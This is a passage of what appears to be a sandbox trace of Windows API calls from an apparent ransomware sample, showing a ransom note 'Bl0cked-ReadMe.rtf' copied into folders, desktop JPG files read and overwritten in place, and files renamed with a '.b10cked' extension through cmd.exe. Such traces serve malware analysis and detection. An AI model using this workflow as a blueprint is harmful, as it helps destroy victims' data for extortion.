lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0138.589] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0138.590] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0138.590] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0138.590] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0138.590] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0138.590] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0138.590] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xe90, 
dwThreadId=0xeb4)) returned 1 [0138.601] CloseHandle (hObject=0x110) returned 1 [0138.601] CloseHandle (hObject=0x114) returned 1 [0138.601] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf")) returned 0x20 [0138.601] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0138.601] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0138.601] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0138.601] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.601] ReleaseMutex (hMutex=0xf8) returned 1 [0138.601] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.602] ReleaseMutex (hMutex=0xf8) returned 1 [0138.602] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.602] ReleaseMutex (hMutex=0xf8) returned 1 [0138.602] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.602] ReleaseMutex (hMutex=0xf8) returned 1 [0138.602] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\bkwvsdvucmd7unf_5 x.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12152 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.602] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19539114787) returned 1 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12152 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12152 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x12152 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12152 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12152 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12152 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12152 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.603] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12152 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12152 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x11c6a [0138.603] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0138.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0138.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x12152 [0138.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0138.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x12152 [0138.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.605] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x90a8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x90a8, lpOverlapped=0x0) returned 1 [0138.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.605] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x90a8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x90a8, lpOverlapped=0x0) returned 1 [0138.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=-37032, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x90aa [0138.605] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x90a8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x90a8, lpOverlapped=0x0) returned 1 [0138.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=-37032, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x90aa [0138.606] WriteFile (in: 
hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x90a8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x90a8, lpOverlapped=0x0) returned 1 [0138.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bkwVSdvUcmd7uNf_5 x.jpg", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0138.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bkwVSdvUcmd7uNf_5 x.jpg", cchWideChar=23, lpMultiByteStr=0x1328834, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bkwVSdvUcmd7uNf_5 x.jpg", lpUsedDefaultChar=0x0) returned 23 [0138.609] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x12152 [0138.609] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0138.610] CloseHandle (hObject=0x114) returned 1 [0138.611] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG") returned 0x25 [0138.611] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0138.611] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG\" \"C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, 
lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG\" \"C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xeb8, dwThreadId=0xe74)) returned 1 [0138.783] CloseHandle (hObject=0x110) returned 1 [0138.783] CloseHandle (hObject=0x114) returned 1 [0138.783] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.783] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0138.783] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount2=41) returned 1 [0138.783] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.783] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.783] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0138.783] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.783] ReleaseMutex (hMutex=0xf8) returned 1 [0138.783] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.783] ReleaseMutex (hMutex=0xf8) returned 1 [0138.783] 
WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.783] ReleaseMutex (hMutex=0xf8) returned 1 [0138.783] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.784] ReleaseMutex (hMutex=0xf8) returned 1 [0138.784] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\4_irbu3smzgt2kgk_co7.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc483 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.784] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19557311664) returned 1 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc483 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc483 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xc483 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc483 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc483 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.785] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc483 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc483 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc483 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc483 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 
0xbf9b [0138.785] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0138.786] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0138.786] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.786] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xc483 [0138.786] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.786] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0138.786] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.786] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xc483 [0138.786] SetFilePointer (in: 